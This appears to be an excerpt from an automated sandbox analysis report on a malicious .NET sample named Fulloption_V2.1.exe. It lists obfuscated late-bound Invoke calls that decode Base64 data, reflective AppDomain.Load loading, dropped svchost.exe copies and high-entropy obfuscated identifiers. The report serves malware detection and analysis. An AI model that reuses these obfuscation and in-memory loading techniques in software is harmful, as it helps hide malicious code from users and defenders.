                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.hNOHDG8JesKswFNAOD4uikWJfSdvhtPJ0KU5,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.FhuHT39Hcrlpc3VJzcpEmZexIK3HCerG0Y9C,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.Fgv43nUc5XFwvkWRKAUtNKcyXyeibqIt7pNX,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.ZFV5io1ixPWDD2eFsMz69Tv1tcmCSCWiWL5U,bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.RD1n5VxC4F1jd()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_97UxX4hYfrlqB90jHyZNjaFATDKVkSvqCGVirJlrqs5Be1ExpHdiY[2],bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.WRxv5EAB1AsaF(Convert.FromBase64String(_97UxX4hYfrlqB90jHyZNjaFATDKVkSvqCGVirJlrqs5Be1ExpHdiY[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: svchost.exe.3.dr, WOPIrDqarnk5N4gzqAP25.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.hNOHDG8JesKswFNAOD4uikWJfSdvhtPJ0KU5,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.FhuHT39Hcrlpc3VJzcpEmZexIK3HCerG0Y9C,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.Fgv43nUc5XFwvkWRKAUtNKcyXyeibqIt7pNX,ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.ZFV5io1ixPWDD2eFsMz69Tv1tcmCSCWiWL5U,bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.RD1n5VxC4F1jd()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: svchost.exe.3.dr, WOPIrDqarnk5N4gzqAP25.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_97UxX4hYfrlqB90jHyZNjaFATDKVkSvqCGVirJlrqs5Be1ExpHdiY[2],bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.WRxv5EAB1AsaF(Convert.FromBase64String(_97UxX4hYfrlqB90jHyZNjaFATDKVkSvqCGVirJlrqs5Be1ExpHdiY[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: svchost.exe.0.dr, WOPIrDqarnk5N4gzqAP25.cs.Net Code: EhVpMT8GhwZpb01mGHvMU System.AppDomain.Load(byte[])
                        Source: svchost.exe.0.dr, WOPIrDqarnk5N4gzqAP25.cs.Net Code: i8a1GMg98692O7b3mEydE System.AppDomain.Load(byte[])
                        Source: svchost.exe.0.dr, WOPIrDqarnk5N4gzqAP25.cs.Net Code: i8a1GMg98692O7b3mEydE
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs.Net Code: EhVpMT8GhwZpb01mGHvMU System.AppDomain.Load(byte[])
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs.Net Code: i8a1GMg98692O7b3mEydE System.AppDomain.Load(byte[])
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs.Net Code: i8a1GMg98692O7b3mEydE
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs.Net Code: EhVpMT8GhwZpb01mGHvMU System.AppDomain.Load(byte[])
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs.Net Code: i8a1GMg98692O7b3mEydE System.AppDomain.Load(byte[])
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, WOPIrDqarnk5N4gzqAP25.cs.Net Code: i8a1GMg98692O7b3mEydE
                        Source: svchost.exe.3.dr, WOPIrDqarnk5N4gzqAP25.cs.Net Code: EhVpMT8GhwZpb01mGHvMU System.AppDomain.Load(byte[])
                        Source: svchost.exe.3.dr, WOPIrDqarnk5N4gzqAP25.cs.Net Code: i8a1GMg98692O7b3mEydE System.AppDomain.Load(byte[])
                        Source: svchost.exe.3.dr, WOPIrDqarnk5N4gzqAP25.cs.Net Code: i8a1GMg98692O7b3mEydE
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeCode function: 2_2_00007FF6AE6E0D9C push rsi; ret 2_2_00007FF6AE6E0DA1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD3479D2A5 pushad ; iretd 4_2_00007FFD3479D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD3477D2A5 pushad ; iretd 7_2_00007FFD3477D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD3479D2A5 pushad ; iretd 12_2_00007FFD3479D2A6
                        Source: svchost.exe.0.dr, epshUjPPFi8VAukWaTuS6SgPmPHhoxaSEk0RkjN7LYEiZkZLfM8XgYvqprlPD2I4acyXu2wsNSVFFzmTz0D8SL0A.csHigh entropy of concatenated method names: 'lLlozhn22xlByUn733fdwBdhLMxxLGDU3yanVulQvTYnjik1GRJ7ddmG2WNhEbgulpVURp9dM8OYozff7A1ScMEe', 'RFLWhqlB4KP4usbHtAhcFrt7M2SSzXSJ5WRDwp29EUAwOdSQlY1UKdvKOKhyvS21GH2cUQh4cSPht7WrBxrn0pRU', '_1vYZFEIcFnzwLBg1OX5thISvJlmznuv', 'nCneH4pLXzIeclOmQvEQMJB7BnApoImKgRx1dhJaFbFBSQt2xBvQJ5CPB9', 'BOTP9EOLEYvGi2ghNdyqOyGVsBWN1o7fEgaUam7bLWFGszL9D8FNdrJjDe', '_69qbXEv5idF2syalvaJXZi5AaXaM3QQxdEhhVl40XOsJtTPNXfHejc8IIa', 'yJtdWi5MAxvaMnSHZoWYsZgzCjPAee7r3ATSL2PvJCeXvjzv3Ecudd2ZuN', '_9fOKoWoFegi8YVdh0pvC8jnvv1Sr6v48w9NMW8fHJRvzlSXu9TR8EvuwPk', 'jR0bU97EzqUKmO6fpzyHCAuv7wntaxMMDQw64KlxkfoFja4R13skbGJUS3', 'E7DQO66sDqRGGq9Ru7eAJ0tTp0T7yOxkXzo0cPX2jbzTOh2k80Af8Lvtwn'
                        Source: svchost.exe.0.dr, ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.csHigh entropy of concatenated method names: 'fkNZMK99FovrpzCSQil6vfrfaJ7gik3', 'xKm7QDoGTWTe3GiIsGCTkO2PudjrwCW', 'tIk6KXWJhXgWRXmdx11z59eQP2Gyx2U', 'booBJ8dQVHmf7b9XsC8UT44ngHrTkRb'
                        Source: svchost.exe.0.dr, mwrQFcRkt38gC1V5xNqClLYt3hU6PBDmWtPNwgdnjJxNwRqVITbV0j9tBhXXeUo6OrvPn8XjWJhcmMtRZLdI8aZSthzJL.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_41DVHCHdjNjbSymvUA811Mu6GOGmw6I', '_3b0M4lkDBK0G57gZKI5mkapNSeXoDow', 'orJjXw10OSLgmbgN7TcjjJYBL2KxYST', 'ywX6wxXVWRmCnUHN8JWJ7p8iOUQQIst'
                        Source: svchost.exe.0.dr, ksVOLHYH2txrD1f6ZGsKecdyfCOq3zVBvKZG.csHigh entropy of concatenated method names: 'oIPsJaB8XlkzabBMzgv4On2y0sKXKhIyCuiM', 'Q9ACwG9UvNoHaZuGESGacA1IuTfQpLdmMuw7', '_6iwntAMKD7CDTKUHnirMFpQLYUfqKwou1CDV', 'VOgpGbULgv102EpX4TvA7HzfJ5jSdOHjj8rJ', 'ggw1UNGjFtZAfjCjGRXRLlyI4IrxvUQRSxfA', '_737T5sTr0U5DmDxgXVd15DEctWP4V8uYaNP4', 'W6W3YaFOa0rOLlQdSMmfFxxSCCMov9FCbY7y', '_2og22vWbcGmUERr9elI0A4vZ2eJn9rryc0k6', '_121I85bmxg5hviaYXiTqawofSR15m8oXojN1', 'BZIbxmgfFERXav8ZFFXXQyUtNFAOTS5spx69'
                        Source: svchost.exe.0.dr, uP2b6O9KTPI4vnSI1dUR307wFVvyBMXKBkdiV3aZulCaIXtlxiT7MJP0PcYVqnbWEh1PpVH.csHigh entropy of concatenated method names: '_4whaG0NfKPgd4ZkMPVa3sLuuwMGAph72tU6zI98PGqCJTdmymoQcTnZTf7uN8dzPnKVaqOB', 'cqtQEUcKPRtCO0l3Z5D6iaCC07cz2j4TjhKqZFQd0jwPR6iksDjDyoLIHUXyVuU91PjKzGg', 'nEZIUUNa036X5AaNVDQ2ozCTqpobwqZBcDBhFiSps3BJLkNIzO9Pg4t4Yu3QgyRYiNfNQvp', 'VGK8JmHpQfVdpmGXNP69EueY8OYk3BTbErbV8X5Csk5QjVtzDU7exK36kFDWMqIRJp9QRU2', 'jj4xD19z5GpuhgD95bM5GWbbDSgqdv4GX5V0sD7P', 'uToy5TZO8ZswGteckj5ExX1O8MYhrSeG90gzz5Zn', 'hW5Qy1eLqYfN6p36MB0aPR73GuN5utyOdI2g0b1g', 'bvRYn6cDQsOaHDhNaYay3JXpX1PklhA1r6ovypM6', '_0Pvz8TeM8TOWTtLf3KI7iZGkSEUCGzFtz0X1OkPc', 'JnH4Y6npZxaMxVJmRRKJN8grWyPSGJ3ZZjqQLxVJ'
                        Source: svchost.exe.0.dr, QrEb9vEQK30TbzqrpPRS8gMxn9hcElerDl9JLkmyiIwgNpEMK2Koy.csHigh entropy of concatenated method names: 'nJ4pCkj81LCk8n9M8r0MuxIGdnZGl3UhEuz8KZazncDp52HQaHWaq', '_1WsMSTZltwhQ8Ljacv3qEnOxQyuZeLWnd9NghzytYRpDQebm5DCGJ', 'uWgWaB5JuiKDElvIH7DNHJAAjQfKtbbUVmMEA1FG6Ryv0EJL710ly', 'fDjOZD38dKxo9Qvg7Li01H0SaYYrlzAv4RczkgRf2FPDW0bP7MMLt', 'oqk4bCr5n4TPUhNHgAnAi19CtOzg9s5wT8wjOSoLYIJA6asLGz58A', 'fYft3dOnodl407XwgHbSuPsc0WF1m6PPk55FsMLiDDWwX10Vqenrm', 'EdRAkl5K2RTyRBJoBy8pC3XY3WVME84TvI7tXIlxdZpehprJkJ9oo', 'uribgpzGSIR1DWzCkWHN7sCiCbFioagrPLh5CjzaeGHWDOwTJFxw8', '_7Uvq2gvbpbOWQpewNW9TtAztXgGrGZ1Zkw3iHpJ0PEa7P67Zmr6R31hg7ZZDaJoNrXQLwkz3OybcHWg4FsSDOk', 'WJqvSELw67r8XXRJVpiS7TGH4nGN2gQ5b4aRlNM7d1VQxmVIrHJEelvBaciD9o8O5yHs5rOyFIZh2ek7o04NO7'
                        Source: svchost.exe.0.dr, HHjXEnOXMpZZX0t333rKZzttX3c0bCGrLWdWm8VpSuXC8NLbGmkV7.csHigh entropy of concatenated method names: 'Pn7KfKAyyOMB9Pxh2oUTavMs2mIlIVjOPRO2lVPNTdUKCqsrCu7Rw', '_0Wy8cULXkdC7gFDLqOEkoWZ', 'R0CPTb6Nt5KR1uU9gJU7bge', 'SIz1A0AO4szxhhh7r93Ktkc', '_1EVdRepVsmQc8aXYbNxJhsV'
                        Source: svchost.exe.0.dr, kODcMrMfbJsHKpWg5CMjXYUidOLklO3xTawO2wUujdr4ldH76Vph40oLvTg5q7hBmeg6qLH.csHigh entropy of concatenated method names: 'QLoIK6MQKZjSrX4c4Urrk8j1IJEZkRJzsaV5odMpkpsqnbGzoeibxctIRypNw3WG32idsDM', 'cTyY8LYhw8rJauQzbgRcncL1IAju3piSg7DsEzD7', 'sP0vEm0wuY3OgW7khbkQW6wsh50oo3Y3XCLYw5q4', 'blhGtCwY9J06zKYhJgaHA2I3GxJvOjIo5RXdBpEO', '_8JVR6RNsuQwmXdHgGw2fiXKBvlad0tKb2cFvJ1mz'
                        Source: svchost.exe.0.dr, WOPIrDqarnk5N4gzqAP25.csHigh entropy of concatenated method names: 'xoboGU6a1ItakvDvtzSPS', 'EhVpMT8GhwZpb01mGHvMU', '_0GifaBSmFVIn1n9GU4E0Y', '_0kDl49Cffw8kYkSs81KAV', 'OdrlfifM3gg31HIjeUXPp', 'R36sh6plTKMWM2lS0LJ6Y', 'PisVAydldAR5GNtCSQxnH', '_3QvDovLndaksT3UJQM35x', '_8EH1qNwMzZa7aGmGOc83k', '_1fpLGU6RLRAN4gi7eSHVa'
                        Source: svchost.exe.0.dr, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.csHigh entropy of concatenated method names: 'VV1389fJAaw2xMLnzXDcLkTAWCYNTgGHa259', 'nllw1xMJI3tMcAbD2LMS7730GRBaKGc90xBh', 'ACFjARoWtcWCQ0pfVq4tkjPYbQiDXhY9aka2', 'LbzLCXyTfe7RmnKbSxX8GlKEyxcxAgdzQMur', 'VqjCXC6Je77iK61L90x5KUxjEnHkN8FKROzn', 'ukH5jJIaius70tje6nPoxgEz7ZfihLxNHIPz', 'eYGnoOsvEp9cK5llPRmQ3p7bpwwORYtXPjmk', 'j1NM555wUAdu9y59lVk5q94CntDdRNIxcx6E', 'TTO8yrgrAvaj8dGKwmb3H94DfPJhGoT92zah', 'Da3MybxiBo2Ybz1f3SlfIBtNgb6f6xAe99d5'
                        Source: svchost.exe.0.dr, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.csHigh entropy of concatenated method names: 'TMzGgVgQoxXYCRFfkMTai490uZGlUHLySUqT7Z2gQ0KnfedSjkB5yLmxCAnTaFn65mbTciy', 'uy94aOUEW6mC9', 'RgUy88j1EMNau', '_0MWOCNlw01UKe', 'y5wKvQZTM4bGH', 'Ub497o83BvnK5', 'NXfPr1Yvwda78', 'ryAb5ogeWmK1p', 'Yy4aahsIgvIB1', 'iwKahv22KUBQj'
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, epshUjPPFi8VAukWaTuS6SgPmPHhoxaSEk0RkjN7LYEiZkZLfM8XgYvqprlPD2I4acyXu2wsNSVFFzmTz0D8SL0A.csHigh entropy of concatenated method names: 'lLlozhn22xlByUn733fdwBdhLMxxLGDU3yanVulQvTYnjik1GRJ7ddmG2WNhEbgulpVURp9dM8OYozff7A1ScMEe', 'RFLWhqlB4KP4usbHtAhcFrt7M2SSzXSJ5WRDwp29EUAwOdSQlY1UKdvKOKhyvS21GH2cUQh4cSPht7WrBxrn0pRU', '_1vYZFEIcFnzwLBg1OX5thISvJlmznuv', 'nCneH4pLXzIeclOmQvEQMJB7BnApoImKgRx1dhJaFbFBSQt2xBvQJ5CPB9', 'BOTP9EOLEYvGi2ghNdyqOyGVsBWN1o7fEgaUam7bLWFGszL9D8FNdrJjDe', '_69qbXEv5idF2syalvaJXZi5AaXaM3QQxdEhhVl40XOsJtTPNXfHejc8IIa', 'yJtdWi5MAxvaMnSHZoWYsZgzCjPAee7r3ATSL2PvJCeXvjzv3Ecudd2ZuN', '_9fOKoWoFegi8YVdh0pvC8jnvv1Sr6v48w9NMW8fHJRvzlSXu9TR8EvuwPk', 'jR0bU97EzqUKmO6fpzyHCAuv7wntaxMMDQw64KlxkfoFja4R13skbGJUS3', 'E7DQO66sDqRGGq9Ru7eAJ0tTp0T7yOxkXzo0cPX2jbzTOh2k80Af8Lvtwn'
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.csHigh entropy of concatenated method names: 'fkNZMK99FovrpzCSQil6vfrfaJ7gik3', 'xKm7QDoGTWTe3GiIsGCTkO2PudjrwCW', 'tIk6KXWJhXgWRXmdx11z59eQP2Gyx2U', 'booBJ8dQVHmf7b9XsC8UT44ngHrTkRb'
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, mwrQFcRkt38gC1V5xNqClLYt3hU6PBDmWtPNwgdnjJxNwRqVITbV0j9tBhXXeUo6OrvPn8XjWJhcmMtRZLdI8aZSthzJL.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_41DVHCHdjNjbSymvUA811Mu6GOGmw6I', '_3b0M4lkDBK0G57gZKI5mkapNSeXoDow', 'orJjXw10OSLgmbgN7TcjjJYBL2KxYST', 'ywX6wxXVWRmCnUHN8JWJ7p8iOUQQIst'
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, ksVOLHYH2txrD1f6ZGsKecdyfCOq3zVBvKZG.csHigh entropy of concatenated method names: 'oIPsJaB8XlkzabBMzgv4On2y0sKXKhIyCuiM', 'Q9ACwG9UvNoHaZuGESGacA1IuTfQpLdmMuw7', '_6iwntAMKD7CDTKUHnirMFpQLYUfqKwou1CDV', 'VOgpGbULgv102EpX4TvA7HzfJ5jSdOHjj8rJ', 'ggw1UNGjFtZAfjCjGRXRLlyI4IrxvUQRSxfA', '_737T5sTr0U5DmDxgXVd15DEctWP4V8uYaNP4', 'W6W3YaFOa0rOLlQdSMmfFxxSCCMov9FCbY7y', '_2og22vWbcGmUERr9elI0A4vZ2eJn9rryc0k6', '_121I85bmxg5hviaYXiTqawofSR15m8oXojN1', 'BZIbxmgfFERXav8ZFFXXQyUtNFAOTS5spx69'
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, uP2b6O9KTPI4vnSI1dUR307wFVvyBMXKBkdiV3aZulCaIXtlxiT7MJP0PcYVqnbWEh1PpVH.csHigh entropy of concatenated method names: '_4whaG0NfKPgd4ZkMPVa3sLuuwMGAph72tU6zI98PGqCJTdmymoQcTnZTf7uN8dzPnKVaqOB', 'cqtQEUcKPRtCO0l3Z5D6iaCC07cz2j4TjhKqZFQd0jwPR6iksDjDyoLIHUXyVuU91PjKzGg', 'nEZIUUNa036X5AaNVDQ2ozCTqpobwqZBcDBhFiSps3BJLkNIzO9Pg4t4Yu3QgyRYiNfNQvp', 'VGK8JmHpQfVdpmGXNP69EueY8OYk3BTbErbV8X5Csk5QjVtzDU7exK36kFDWMqIRJp9QRU2', 'jj4xD19z5GpuhgD95bM5GWbbDSgqdv4GX5V0sD7P', 'uToy5TZO8ZswGteckj5ExX1O8MYhrSeG90gzz5Zn', 'hW5Qy1eLqYfN6p36MB0aPR73GuN5utyOdI2g0b1g', 'bvRYn6cDQsOaHDhNaYay3JXpX1PklhA1r6ovypM6', '_0Pvz8TeM8TOWTtLf3KI7iZGkSEUCGzFtz0X1OkPc', 'JnH4Y6npZxaMxVJmRRKJN8grWyPSGJ3ZZjqQLxVJ'
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, QrEb9vEQK30TbzqrpPRS8gMxn9hcElerDl9JLkmyiIwgNpEMK2Koy.csHigh entropy of concatenated method names: 'nJ4pCkj81LCk8n9M8r0MuxIGdnZGl3UhEuz8KZazncDp52HQaHWaq', '_1WsMSTZltwhQ8Ljacv3qEnOxQyuZeLWnd9NghzytYRpDQebm5DCGJ', 'uWgWaB5JuiKDElvIH7DNHJAAjQfKtbbUVmMEA1FG6Ryv0EJL710ly', 'fDjOZD38dKxo9Qvg7Li01H0SaYYrlzAv4RczkgRf2FPDW0bP7MMLt', 'oqk4bCr5n4TPUhNHgAnAi19CtOzg9s5wT8wjOSoLYIJA6asLGz58A', 'fYft3dOnodl407XwgHbSuPsc0WF1m6PPk55FsMLiDDWwX10Vqenrm', 'EdRAkl5K2RTyRBJoBy8pC3XY3WVME84TvI7tXIlxdZpehprJkJ9oo', 'uribgpzGSIR1DWzCkWHN7sCiCbFioagrPLh5CjzaeGHWDOwTJFxw8', '_7Uvq2gvbpbOWQpewNW9TtAztXgGrGZ1Zkw3iHpJ0PEa7P67Zmr6R31hg7ZZDaJoNrXQLwkz3OybcHWg4FsSDOk', 'WJqvSELw67r8XXRJVpiS7TGH4nGN2gQ5b4aRlNM7d1VQxmVIrHJEelvBaciD9o8O5yHs5rOyFIZh2ek7o04NO7'
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, HHjXEnOXMpZZX0t333rKZzttX3c0bCGrLWdWm8VpSuXC8NLbGmkV7.csHigh entropy of concatenated method names: 'Pn7KfKAyyOMB9Pxh2oUTavMs2mIlIVjOPRO2lVPNTdUKCqsrCu7Rw', '_0Wy8cULXkdC7gFDLqOEkoWZ', 'R0CPTb6Nt5KR1uU9gJU7bge', 'SIz1A0AO4szxhhh7r93Ktkc', '_1EVdRepVsmQc8aXYbNxJhsV'
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, kODcMrMfbJsHKpWg5CMjXYUidOLklO3xTawO2wUujdr4ldH76Vph40oLvTg5q7hBmeg6qLH.csHigh entropy of concatenated method names: 'QLoIK6MQKZjSrX4c4Urrk8j1IJEZkRJzsaV5odMpkpsqnbGzoeibxctIRypNw3WG32idsDM', 'cTyY8LYhw8rJauQzbgRcncL1IAju3piSg7DsEzD7', 'sP0vEm0wuY3OgW7khbkQW6wsh50oo3Y3XCLYw5q4', 'blhGtCwY9J06zKYhJgaHA2I3GxJvOjIo5RXdBpEO', '_8JVR6RNsuQwmXdHgGw2fiXKBvlad0tKb2cFvJ1mz'
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, WOPIrDqarnk5N4gzqAP25.csHigh entropy of concatenated method names: 'xoboGU6a1ItakvDvtzSPS', 'EhVpMT8GhwZpb01mGHvMU', '_0GifaBSmFVIn1n9GU4E0Y', '_0kDl49Cffw8kYkSs81KAV', 'OdrlfifM3gg31HIjeUXPp', 'R36sh6plTKMWM2lS0LJ6Y', 'PisVAydldAR5GNtCSQxnH', '_3QvDovLndaksT3UJQM35x', '_8EH1qNwMzZa7aGmGOc83k', '_1fpLGU6RLRAN4gi7eSHVa'
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.csHigh entropy of concatenated method names: 'VV1389fJAaw2xMLnzXDcLkTAWCYNTgGHa259', 'nllw1xMJI3tMcAbD2LMS7730GRBaKGc90xBh', 'ACFjARoWtcWCQ0pfVq4tkjPYbQiDXhY9aka2', 'LbzLCXyTfe7RmnKbSxX8GlKEyxcxAgdzQMur', 'VqjCXC6Je77iK61L90x5KUxjEnHkN8FKROzn', 'ukH5jJIaius70tje6nPoxgEz7ZfihLxNHIPz', 'eYGnoOsvEp9cK5llPRmQ3p7bpwwORYtXPjmk', 'j1NM555wUAdu9y59lVk5q94CntDdRNIxcx6E', 'TTO8yrgrAvaj8dGKwmb3H94DfPJhGoT92zah', 'Da3MybxiBo2Ybz1f3SlfIBtNgb6f6xAe99d5'
                        Source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.csHigh entropy of concatenated method names: 'TMzGgVgQoxXYCRFfkMTai490uZGlUHLySUqT7Z2gQ0KnfedSjkB5yLmxCAnTaFn65mbTciy', 'uy94aOUEW6mC9', 'RgUy88j1EMNau', '_0MWOCNlw01UKe', 'y5wKvQZTM4bGH', 'Ub497o83BvnK5', 'NXfPr1Yvwda78', 'ryAb5ogeWmK1p', 'Yy4aahsIgvIB1', 'iwKahv22KUBQj'
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, epshUjPPFi8VAukWaTuS6SgPmPHhoxaSEk0RkjN7LYEiZkZLfM8XgYvqprlPD2I4acyXu2wsNSVFFzmTz0D8SL0A.csHigh entropy of concatenated method names: 'lLlozhn22xlByUn733fdwBdhLMxxLGDU3yanVulQvTYnjik1GRJ7ddmG2WNhEbgulpVURp9dM8OYozff7A1ScMEe', 'RFLWhqlB4KP4usbHtAhcFrt7M2SSzXSJ5WRDwp29EUAwOdSQlY1UKdvKOKhyvS21GH2cUQh4cSPht7WrBxrn0pRU', '_1vYZFEIcFnzwLBg1OX5thISvJlmznuv', 'nCneH4pLXzIeclOmQvEQMJB7BnApoImKgRx1dhJaFbFBSQt2xBvQJ5CPB9', 'BOTP9EOLEYvGi2ghNdyqOyGVsBWN1o7fEgaUam7bLWFGszL9D8FNdrJjDe', '_69qbXEv5idF2syalvaJXZi5AaXaM3QQxdEhhVl40XOsJtTPNXfHejc8IIa', 'yJtdWi5MAxvaMnSHZoWYsZgzCjPAee7r3ATSL2PvJCeXvjzv3Ecudd2ZuN', '_9fOKoWoFegi8YVdh0pvC8jnvv1Sr6v48w9NMW8fHJRvzlSXu9TR8EvuwPk', 'jR0bU97EzqUKmO6fpzyHCAuv7wntaxMMDQw64KlxkfoFja4R13skbGJUS3', 'E7DQO66sDqRGGq9Ru7eAJ0tTp0T7yOxkXzo0cPX2jbzTOh2k80Af8Lvtwn'
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, ejWjGDbAxW2UWmUUgPjpirDVQzujTDixN6fX.csHigh entropy of concatenated method names: 'fkNZMK99FovrpzCSQil6vfrfaJ7gik3', 'xKm7QDoGTWTe3GiIsGCTkO2PudjrwCW', 'tIk6KXWJhXgWRXmdx11z59eQP2Gyx2U', 'booBJ8dQVHmf7b9XsC8UT44ngHrTkRb'
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, mwrQFcRkt38gC1V5xNqClLYt3hU6PBDmWtPNwgdnjJxNwRqVITbV0j9tBhXXeUo6OrvPn8XjWJhcmMtRZLdI8aZSthzJL.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_41DVHCHdjNjbSymvUA811Mu6GOGmw6I', '_3b0M4lkDBK0G57gZKI5mkapNSeXoDow', 'orJjXw10OSLgmbgN7TcjjJYBL2KxYST', 'ywX6wxXVWRmCnUHN8JWJ7p8iOUQQIst'
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, ksVOLHYH2txrD1f6ZGsKecdyfCOq3zVBvKZG.csHigh entropy of concatenated method names: 'oIPsJaB8XlkzabBMzgv4On2y0sKXKhIyCuiM', 'Q9ACwG9UvNoHaZuGESGacA1IuTfQpLdmMuw7', '_6iwntAMKD7CDTKUHnirMFpQLYUfqKwou1CDV', 'VOgpGbULgv102EpX4TvA7HzfJ5jSdOHjj8rJ', 'ggw1UNGjFtZAfjCjGRXRLlyI4IrxvUQRSxfA', '_737T5sTr0U5DmDxgXVd15DEctWP4V8uYaNP4', 'W6W3YaFOa0rOLlQdSMmfFxxSCCMov9FCbY7y', '_2og22vWbcGmUERr9elI0A4vZ2eJn9rryc0k6', '_121I85bmxg5hviaYXiTqawofSR15m8oXojN1', 'BZIbxmgfFERXav8ZFFXXQyUtNFAOTS5spx69'
                        Source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, uP2b6O9KTPI4vnSI1dUR307wFVvyBMXKBkdiV3aZulCaIXtlxiT7MJP0PcYVqnbWEh1PpVH.csHigh entropy of concatenated method names: '_4whaG0NfKPgd4ZkMPVa3sLuuwMGAph72tU6zI98PGqCJTdmymoQcTnZTf7uN8dzPnKVaqOB', 'cqtQEUcKPRtCO0l3Z5D6iaCC07cz2j4TjhKqZFQd0jwPR6iksDjDyoLIHUXyVuU91PjKzGg', 'nEZIUUNa036X5AaNVDQ2ozCTqpobwqZBcDBhFiSps3BJLkNIzO9Pg4t4Yu3QgyRYiNfNQvp', 'VGK8JmHpQfVdpmGXNP69EueY8OYk3BTbErbV8X5Csk5QjVtzDU7exK36kFDWMqIRJp9QRU2', 'jj4xD19z5GpuhgD95bM5GWbbDSgqdv4GX5V0sD7P', 'uToy5TZO8ZswGteckj5ExX1O8MYhrSeG90gzz5Zn', 'hW5Qy1eLqYfN6p36MB0aPR73GuN5utyOdI2g0b1g', 'bvRYn6cDQsOaHDhNaYay3JXpX1PklhA1r6ovypM6', '_0Pvz8TeM8TOWTtLf3KI7iZGkSEUCGzFtz0X1OkPc', 'JnH4Y6npZxaMxVJmRRKJN8grWyPSGJ3ZZjqQLxVJ'
